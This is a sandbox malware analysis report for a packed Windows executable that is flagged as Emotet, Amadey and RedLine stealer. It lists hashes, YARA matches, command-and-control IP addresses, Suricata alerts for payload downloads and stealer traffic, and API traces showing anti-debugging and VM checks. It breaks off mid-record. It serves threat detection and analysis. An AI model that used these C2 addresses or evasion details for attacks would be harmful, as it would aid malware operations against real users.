Summary | ZeroBOX

download.php

RedlineStealer Emotet XMRig Miner RedLine stealer Gen1 Generic Malware Themida UPX Downloader Antivirus Malicious Packer .NET framework(MSIL) Malicious Library Admin Tool (Sysinternals etc ...) DGA ScreenShot Create Service Http API Socket
Category Machine Started Completed
FILE s1_win7_x6403_us April 21, 2025, 9:58 a.m. April 21, 2025, 10:04 a.m.
Size 2.1MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 7fabf8c4efb42fd2239eadae059e533e
SHA256 67b971cc385a4b5241f301f1d9ecef51dd445518bc0cee675d29e67292134379
CRC32 F34F4FB7
ssdeep 49152:LvIWqgJpdEsqBgveziddkZCasKnS9SuIoHAoY:EobEsqOxkCasKS0uIogo
PDB Path wextract.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.215.113.41 Active Moloch
185.215.113.59 Active Moloch
193.233.237.109 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.59:80 -> 192.168.56.103:49167 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 185.215.113.41:80 -> 192.168.56.103:49172 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 185.215.113.59:80 -> 192.168.56.103:49167 2060969 ET MALWARE Amadey CnC Response Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49168 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49174 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49176 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49176 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49168 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49168 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49168 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49183 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49189 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49189 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49183 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49183 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49183 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49195 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49195 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 193.233.237.109:1912 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 193.233.237.109:1912 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49208 -> 193.233.237.109:1912 2046045 ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 193.233.237.109:1912 -> 192.168.56.103:49208 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.103:49208 -> 193.233.237.109:1912 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 193.233.237.109:1912 -> 192.168.56.103:49208 2046056 ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) A Network Trojan was detected
TCP 192.168.56.103:49195 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Processing -WindowStyle 'H' failed: Cannot convert value "H" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized".
console_handle: 0x0000001f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026e960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026e2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0026eaa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b6740
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd190
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd6d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd6d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd6d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd430
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bd5f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bdc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bdc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2bdc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2a6f00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2a6f00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2a6d40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2a6d40
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2a6f00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2a6f00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2a6f00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2eb2b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc
exception.symbol: 2m8357+0x3020b9
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 3154105
exception.address: 0x12420b9
registers.esp: 3800444
registers.edi: 0
registers.eax: 1
registers.ebp: 3800460
registers.edx: 20832256
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 bf 0c 9f fb 7b 29 f8 5f 56 be 02 c4 ed 56
exception.symbol: 2m8357+0x61aa4
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 400036
exception.address: 0xfa1aa4
registers.esp: 3800408
registers.edi: 1971192040
registers.eax: 16387574
registers.ebp: 4006408212
registers.edx: 15990784
registers.ebx: 16387066
registers.esi: 3
registers.ecx: 1971388416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 83 ec 04 54 e9 d6
exception.symbol: 2m8357+0x60f34
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 397108
exception.address: 0xfa0f34
registers.esp: 3800412
registers.edi: 1971192040
registers.eax: 16420463
registers.ebp: 4006408212
registers.edx: 15990784
registers.ebx: 16387066
registers.esi: 3
registers.ecx: 1971388416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 54 58 05 04 00 00 00 2d 04 00 00 00 87 04
exception.symbol: 2m8357+0x60ffc
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 397308
exception.address: 0xfa0ffc
registers.esp: 3800412
registers.edi: 1971192040
registers.eax: 16391247
registers.ebp: 4006408212
registers.edx: 15990784
registers.ebx: 0
registers.esi: 353517416
registers.ecx: 1971388416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 e9 ab 02 00 00 5f 56 ff 74 24 04 5e 8f 04
exception.symbol: 2m8357+0x62086
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 401542
exception.address: 0xfa2086
registers.esp: 3800412
registers.edi: 1971192040
registers.eax: 30485
registers.ebp: 4006408212
registers.edx: 15990784
registers.ebx: 16422112
registers.esi: 353517416
registers.ecx: 1971388416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 00 00 00 00 57 53 c7 04 24 62 d7 6f 7d ff
exception.symbol: 2m8357+0x6286f
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 403567
exception.address: 0xfa286f
registers.esp: 3800412
registers.edi: 1971192040
registers.eax: 235753
registers.ebp: 4006408212
registers.edx: 15990784
registers.ebx: 16394388
registers.esi: 353517416
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 e9 15 fb ff ff be f2 ad b7 7f f7 d6 46 81
exception.symbol: 2m8357+0x1e44ae
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 1983662
exception.address: 0x11244ae
registers.esp: 3800412
registers.edi: 0
registers.eax: 30467
registers.ebp: 4006408212
registers.edx: 2130566132
registers.ebx: 6094941
registers.esi: 82153
registers.ecx: 17974890
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 8e fe ff ff 81 ec 04 00 00 00 89 04 24 51
exception.symbol: 2m8357+0x1e5c27
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 1989671
exception.address: 0x1125c27
registers.esp: 3800408
registers.edi: 0
registers.eax: 28860
registers.ebp: 4006408212
registers.edx: 1329695299
registers.ebx: 559619585
registers.esi: 17978351
registers.ecx: 17974890
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 3c 24 55 e9 6c fe ff ff
exception.symbol: 2m8357+0x1e5602
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 1988098
exception.address: 0x1125602
registers.esp: 3800412
registers.edi: 4294941336
registers.eax: 28860
registers.ebp: 4006408212
registers.edx: 1329695299
registers.ebx: 559619585
registers.esi: 18007211
registers.ecx: 1549541099
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 53 52 c7 04 24 1d 5f cf 3b 5b 81 f3 0a 2a
exception.symbol: 2m8357+0x1eb923
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2013475
exception.address: 0x112b923
registers.esp: 3800408
registers.edi: 4468656
registers.eax: 18003046
registers.ebp: 4006408212
registers.edx: 18186
registers.ebx: 17981277
registers.esi: 17982998
registers.ecx: 1971442156
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 53 bb 6a fe 17 39 53 81 34 24 12 e2 f7 7d
exception.symbol: 2m8357+0x1eb6fd
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2012925
exception.address: 0x112b6fd
registers.esp: 3800412
registers.edi: 1259
registers.eax: 18031810
registers.ebp: 4006408212
registers.edx: 18186
registers.ebx: 17981277
registers.esi: 17982998
registers.ecx: 4294941516
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 14 24 89 0c 24 89
exception.symbol: 2m8357+0x1f3062
exception.instruction: in eax, dx
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2044002
exception.address: 0x1133062
registers.esp: 3800404
registers.edi: 1259
registers.eax: 1447909480
registers.ebp: 4006408212
registers.edx: 22104
registers.ebx: 1971327157
registers.esi: 18017821
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb
exception.symbol: 2m8357+0x1f31dc
exception.address: 0x11331dc
exception.module: 2m8357.exe
exception.exception_code: 0xc000001d
exception.offset: 2044380
registers.esp: 3800404
registers.edi: 1259
registers.eax: 1
registers.ebp: 4006408212
registers.edx: 22104
registers.ebx: 0
registers.esi: 18017821
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 15 39 2d 12 01
exception.symbol: 2m8357+0x1f269b
exception.instruction: in eax, dx
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2041499
exception.address: 0x113269b
registers.esp: 3800404
registers.edi: 1259
registers.eax: 1447909480
registers.ebp: 4006408212
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 18017821
registers.ecx: 10
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: cd 01 eb 00 6a 00 55 e8 03 00 00 00 20 5d c3 5d
exception.symbol: 2m8357+0x1f7a9c
exception.instruction: int 1
exception.module: 2m8357.exe
exception.exception_code: 0xc0000005
exception.offset: 2063004
exception.address: 0x1137a9c
registers.esp: 3800372
registers.edi: 0
registers.eax: 3800372
registers.ebp: 4006408212
registers.edx: 18053760
registers.ebx: 18054245
registers.esi: 3649746885
registers.ecx: 4294923098
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 da 00 00 00 29 d9 5b 01 f1 81 c1 6b 52 d5
exception.symbol: 2m8357+0x1f8908
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2066696
exception.address: 0x1138908
registers.esp: 3800408
registers.edi: 1259
registers.eax: 29699
registers.ebp: 4006408212
registers.edx: 2130531316
registers.ebx: 18055559
registers.esi: 11937
registers.ecx: 1568800768
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 57 c7 04 24 f7 9f ca 7a e9 12 00 00 00 53 89
exception.symbol: 2m8357+0x1f8bbe
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2067390
exception.address: 0x1138bbe
registers.esp: 3800412
registers.edi: 1259
registers.eax: 29699
registers.ebp: 4006408212
registers.edx: 4294940476
registers.ebx: 18085258
registers.esi: 11937
registers.ecx: 2283
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 5f 00 00 00 33 1c 24 5c 55 89 1c 24 bb c3
exception.symbol: 2m8357+0x207397
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2126743
exception.address: 0x1147397
registers.esp: 3800412
registers.edi: 18118452
registers.eax: 28304
registers.ebp: 4006408212
registers.edx: 0
registers.ebx: 25318452
registers.esi: 1971262480
registers.ecx: 262633
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 c3 59 08 52 4d e9 2e 01 00 00 87 04 24 8b
exception.symbol: 2m8357+0x20b9df
exception.instruction: sti
exception.module: 2m8357.exe
exception.exception_code: 0xc0000096
exception.offset: 2144735
exception.address: 0x114b9df
registers.esp: 3800400
registers.edi: 4023944992
registers.eax: 28209
registers.ebp: 4006408212
registers.edx: 311541953
registers.ebx: 18133303
registers.esi: 1989380932
registers.ecx: 329673588
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 07 00 00 00 31 d6 e9 30 00 00 00 31 d2 e9
